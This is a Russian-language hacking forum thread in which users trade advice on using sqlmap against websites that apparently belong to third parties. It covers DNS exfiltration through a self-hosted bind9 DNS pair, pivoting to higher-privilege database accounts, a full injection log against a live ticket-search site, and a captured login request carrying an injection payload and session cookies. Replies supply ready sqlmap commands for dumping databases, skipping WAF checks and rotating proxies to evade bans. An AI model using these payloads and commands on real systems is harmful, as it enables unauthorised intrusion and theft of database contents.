Покупаешь 2 впс или дедики, ставишь на них бинд9 для поднятия мастер и слейв днс сервера. Потом регаешь домен любой на свои днс, после того как домен делигрировали, запускаешь скульмап с ключом --dns-domain (скульмап нужно запускать не у себя на пк, а на впс там где твой мастер днс) Но заметь DNS exfiltration получится заюзать когда сервер сайта на винде если на линуксе то ничего не выйдет
Подскажите! через sqlmap получил sql inj под ограниченной учеткой, доступно только SELECT, сбрутил хэши других пользователей базы данных у которых больше прав, как мне в sqlmap подключится к другой учетке через sql inj?
для успешной организации DNS-туннеля в Microsoft SQL Server, PostgreSQL и MySQL эти СУБД должны поддерживать пути в формате UNC, что, в общем-то, означает, что такой туннель можно создать, если на сервере в качестве бэкенда будет использоваться ОС Microsoft Windows.
ну не правда же есть нное количество способ сделать резолв домена, например oracle UTL_INADDR.GET_HOST_ADDRESS UTL_HTTP.REQUEST HTTPURITYPE.GETCLOB в postgresql, если не ошибаюсь, можно организовать подключение к удаленной бд "на лету", в текущем подключении, чем не dns exfiltration? пусть даже трафик исходящий зарезан на большинство портов, резолв всё равно в большинстве случаев пройдет
добрый подскажие как решить Как только не пробовал и указывать --dbms=mysql | -b | -f А в результате: [CRITICAL] sqlmap was not able to fingerprint the back-end database management system P.S> Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Spoiler: sqlmap Code: ___ __H__ ___ ___[.]_____ ___ ___ {1.1.1.10#dev} |_ -| . [,] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 10:48:05 [10:48:05] [INFO] parsing HTTP request from 'vsd.txt' [10:48:05] [WARNING] provided value for parameter 'user_search_products[status]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [10:48:05] [WARNING] provided value for parameter 'user_search_products[search_type]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [10:48:05] [INFO] testing connection to the target URL [10:48:06] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS [10:48:08] [WARNING] reflective value(s) found and filtering out [10:48:08] [INFO] testing if the target URL is stable [10:48:09] [INFO] target URL is stable [10:48:09] [INFO] testing if POST parameter 'user_search_products[from]' is dynamic [10:48:10] [INFO] confirming that POST parameter 'user_search_products[from]' is dynamic [10:48:10] [INFO] POST parameter 'user_search_products[from]' is dynamic [10:48:11] [WARNING] heuristic (basic) test shows that POST parameter 'user_search_products[from]' might not be injectable [10:48:11] [INFO] testing for SQL injection on POST parameter 'user_search_products[from]' [10:48:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:48:26] [INFO] POST parameter 'user_search_products[from]' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="\u0421\u0430\u043d\u043a\u0442-\u041f\u0435\u0442\u0435\u0440\u0431\u0443\u0440\u0433, \u0420\u043e\u0441\u0441\u0438\u044f - \u041c\u043e\u0441\u043a\u0432\u0430, \u0420\u043e\u0441\u0441\u0438\u044f") [10:48:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [10:48:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [10:48:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' [10:48:34] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [10:48:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [10:48:35] [INFO] testing 'MySQL inline queries' [10:48:36] [INFO] testing 'PostgreSQL inline queries' [10:48:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [10:48:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [10:48:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' [10:48:38] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' [10:48:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' [10:48:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [10:48:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)' [10:48:40] [INFO] testing 'Oracle AND time-based blind' [10:48:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [10:48:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [10:48:51] [INFO] checking if the injection point on POST parameter 'user_search_products[from]' is a false positive POST parameter 'user_search_products[from]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 65 HTTP(s) requests: --- Parameter: user_search_products[from] (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: user_search_products[from]=%D0%A1%D0%B0%D0%BD%D0%BA%D1%82-%D0%9F%D0%B5%D1%82%D0%B5%D1%80%D0%B1%D1%83%D1%80%D0%B3, %D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F%' AND 5693=5693 AND '%'='&user_search_products[to]=%D0%9C%D0%BE%D1%81%D0%BA%D0%B2%D0%B0, %D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F&user_search_products[startDate]=2017-01-18&user_search_products[endDate]=2017-01-31&user_search_products[train]=train&user_search_products[car]=car&user_search_products[status]=&user_search_products[search_type]=&user_search_products[search]=1&user_search_products[_token]=51dfe11994f10d02f4d92c43fed3b00ef606f937 --- [10:49:00] [INFO] testing MySQL [10:49:00] [WARNING] the back-end DBMS is not MySQL [10:49:00] [INFO] testing Oracle [10:49:01] [WARNING] the back-end DBMS is not Oracle [10:49:01] [INFO] testing PostgreSQL [10:49:01] [WARNING] the back-end DBMS is not PostgreSQL [10:49:01] [INFO] testing Microsoft SQL Server [10:49:02] [WARNING] the back-end DBMS is not Microsoft SQL Server [10:49:02] [INFO] testing SQLite [10:49:02] [WARNING] the back-end DBMS is not SQLite [10:49:02] [INFO] testing Microsoft Access [10:49:03] [WARNING] the back-end DBMS is not Microsoft Access [10:49:03] [INFO] testing Firebird [10:49:03] [WARNING] the back-end DBMS is not Firebird [10:49:03] [INFO] testing SAP MaxDB [10:49:04] [WARNING] the back-end DBMS is not SAP MaxDB [10:49:04] [INFO] testing Sybase [10:49:05] [WARNING] the back-end DBMS is not Sybase [10:49:05] [INFO] testing IBM DB2 [10:49:05] [WARNING] the back-end DBMS is not IBM DB2 [10:49:05] [INFO] testing HSQLDB [10:49:06] [WARNING] the back-end DBMS is not HSQLDB or version is < 1.7.2 [10:49:06] [INFO] testing Informix [10:49:07] [WARNING] the back-end DBMS is not Informix [10:49:07] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system [10:49:07] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 61 times
вообщем уязвимость в файле /login.php Attack details URL encoded POST input vb_login_username was set to -1' OR 3*2*1=6 AND 000491=000491 -- как такое заправить в sqlmap и получить бд? POST /ajax/login.php HTTP/1.1 Content-Length: 193 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http:site.com:80/ Cookie: mfsid=91olg79e3nj5nt6de6ugq5oks7; mfvb_lastvisit=1485043348; msort=views; morder=az; mfvb_sessionhash=a5613f6c416d595ef35b6db03ad466a7; loc=E_E4m6IbF_VLlaDm7ph_BwfJ46y_JHz15zI7eP9Q9gdwwJOr1usrLEth4LHDV1uyf0w6PWeToMTTYQJ0iyccmipr2OpL5jZf; sess=1; anj=dTM7k!M4/8DYRWSF']wIg2E?ajgksu!@wnf]meq8dWME4(EW<KPi?=O; icu=ChIIz5I0EAoYASABKAEwovWPxAUQovWPxAUYAA..; uuid2=232236036324528254; vi=2f37b8a7cdee445385794c4d22490464; fid=43c8d7dc1de0bdc89b1d9515f061c563; ADMARK=Sun, 22 Jan 2017 00:19:45 GMT; JEB2=5883F60075721AC455254076E0000000; __cfduid=d2fb312b6f2dec320460808e564733c5b1485044385; uid=7184278638849739066; AWSELB=83E705210A1682EC371C1D5E2E2558F3D1674E9DA1325CB04AC64150FC8B17E1E912D403C564B53C64E285925EDB501A0CACF3007DD99AD5CF2C680490773520F1E05601D7; KTPCACOOKIE=YES; PUBMDCID=3; pp=51048; pubfreq_87256=; pubtime_87256=TMC; PMDTSHR=cat:; ljt_reader=7bd9ee658b501e8dc00b7f88dbea3e76; ctag=102:1485130790|103:1485130790|168:1485130790|98:1485130790|7:1485130790|163:1485130790|162:1485130790|128:1485130790|161:1485130790|108:1485130790|160:1485130790|167:1485130790|72:1485130790|106:1486253990|166:1485130790|73:1485130790|165:1485130790|164:1485130790|153:1485130790|86:1485130790|155:1485130790|158:1485130790|159:1485130790|94:1485130790; u=aHR0cDovL21hbmdhZm94Lm1lL21hbmdh; pi=5978151310520199952; tp=3%3b1%2f22%2f2017+12%3a19%3a51+AM%3b1%2f29%2f2017+12%3a19%3a51+AM; UM1=sQAAAB-LCAAAAAAAAAvjsuIQEzLjksh0NQnI9jJIDHVLsnCyKHDz8_W38PcOCxPi5pjxb-GtR7MfmgiwSoE47xs6zoE4WgxczhwiQvZcKiaJpsmJ5omJuqYpBia6JgZAVmJaipGuUWKioXGqZYqlqVkK0JxLXVdg5nBwPPmxuZNbgBloiB5HopAWF497amhgSlqGW3KKuyVQcdvEHwhLERwtBgAeqoJGsQAAAA2; TDID=6f762b27-bb26-4c45-b0a7-42a6911a29f5; CS1=2; _t=5c1b5e1e-e039-11e6-a8c7-00259037ff12; _vt=0; 3pids=5031:5978151310520199952 Host: site.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* cookieuser=1&do=login&s=&securitytoken=&vb_login_md5password=&vb_login_md5password_utf=&vb_login_password=g00dPa%24%24w0rD&vb_login_username=-1'%20OR%203*2*1%3d6%20AND%20000491%3d000491%20--%20
sqlmap похоже чекает нет ли там waf Code: ./waf/webappsecure.py:15: return code == 403 попробуй добавить --skip-waf
Думаю так должно пройти ./sqlmap -u site.com --data=cookieuser=1&do=login&s=&securitytoken=&vb_login_md5password=&vb_login_md5password_utf=&vb_login_password=g00dPa%24%24w0rD&vb_login_username=-1'%20OR%203*2*1%3d6%20AND%20000491%3d000491%20--%20 -p vb_login_username --dbs
Code: -u "http://www.site.com/login.php" --random-agent --threads=6 --data="cookieuser=1&do=login&s=&securitytoken=&vb_login_md5password=&vb_login_md5password_utf=&vb_login_password=g00dPa%24%24w0rD&vb_login_username=1*" --level=5 --current-db
Попробуй сохронить cookie в файл ,допустим в sql.txt и после выполни ./sqlmap -r "путь до sql.txt" -p vb_login_username
вообщем есть скуль, time base blind подбирает очень медленно, выдает ошибки, потом при таймауте 7 сек подбирает символ. Но кроме как --current-user ничего не подбирает, кто сталкивался и как действовать?
так скуль скуле рознь, приучайтесь читать логи, опция -v 3 , скульмап обычно пишет где спотыкается, вероятно waf есть
Можно ли запустит sqlmap через список прокси? То есть при попадании в бан 1й прокси брала из списка другую и продолжала работу?